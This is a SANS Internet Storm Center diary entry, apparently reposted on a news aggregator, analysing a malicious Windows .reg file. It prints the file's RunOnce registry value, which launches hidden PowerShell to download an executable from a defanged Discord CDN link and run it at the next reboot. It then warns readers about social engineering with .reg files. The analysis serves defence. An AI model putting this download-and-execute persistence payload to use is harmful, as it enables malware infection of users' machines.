[SANS ISC] Infected With a .reg File, (Fri, Jul 30th)

Yesterday, I reported a piece of malware that uses archive.org to fetch its next stage[1]. Today, I spotted another file that is also interesting: A Windows Registry file (with a “.reg” extension). Such files are text files created by exporting values from the Registry (export) but they can also be used to add or change values in the Registry (import). Being text files, they don’t look suspicious.

Of course, the file has very low VT score (2/58) (SHA256:b20d8723dce70af2ee827177d803f92d10e8274a80c846cf42742370d9f11c65)[2].

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USERSoftwareMicrosoftwindowsCurrentVersionrunonce]
“ray”=”cmd.exe /c cd %USERPROFILE% & powershell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(‘hxxps://cdn[.]discordapp[.]com/attachments/847773813131182112/868160361466040321/Exploit.exe’,’system.exe’);Start ‘system.exe’& exit”

You can see that the Registry file will add a new key in HKCUSoftwareMicrosoftwindowsCurrentVersionrunonce. This means that, at the next reboot, the computer will execute the key value: It will start a Powershell that will fetch the payload from the Discord CDN and executes it.

When you double-click on a .reg file, Windows warns you that “something weird may happen”:

But, with the help of social engineering, it could be possible to force the user to install the Registry key! Also, if you can execute another command line, the reg.exe tool does not provide any warning:

So, be careful with Registry files!

[1] https://isc.sans.edu/forums/diary/Malicious+Content+Delivered+Through+archiveorg/27688/
[2] https://www.virustotal.com/gui/file/b20d8723dce70af2ee827177d803f92d10e8274a80c846cf42742370d9f11c65/content/strings

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Source: Read More (SANS Internet Storm Center, InfoCON: green)

You might be interested in …

Daily NCSC-FI news followup 2021-08-17

BadAlloc Vulnerability Affecting BlackBerry QNX RTOS us-cert.cisa.gov/ncas/alerts/aa21-229a On August 17, 2021, BlackBerry publicly disclosed that its QNX Real Time Operating System (RTOS) is affected by a BadAlloc vulnerabilityCVE-2021-22156. BadAlloc is a collection of vulnerabilities affecting multiple RTOSs and supporting libraries. myös: www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_24/2021 Mandiant Discloses Critical Vulnerability Affecting Millions of IoT Devices www.fireeye.com/blog/threat-research/2021/08/mandiant-discloses-critical-vulnerability-affecting-iot-devices.html Today, Mandiant disclosed […]

Read More

[SecurityWeek] SnapAttack Spins Out of Booz Allen Hamilton With $8 Million in Funding

All posts, Security Week

Threat hunting and detection company SnapAttack this week announced closing an $8 million funding round, just as it spun out of Booz Allen Hamilton. The funding round was led by Volition Capital. Booz Allen Hamilton and Strategic Cyber Ventures (SCV) also invested in the new independent company. read more Source: Read More (SecurityWeek RSS Feed)

Read More

[SANS ISC] ISC Stormcast For Wednesday, November 17th, 2021 https://isc.sans.edu/podcastdetail.html?id=7760, (Wed, Nov 17th)

All posts, Sans-ISC

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Source: Read More (SANS Internet Storm Center, InfoCON: green)

Read More

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.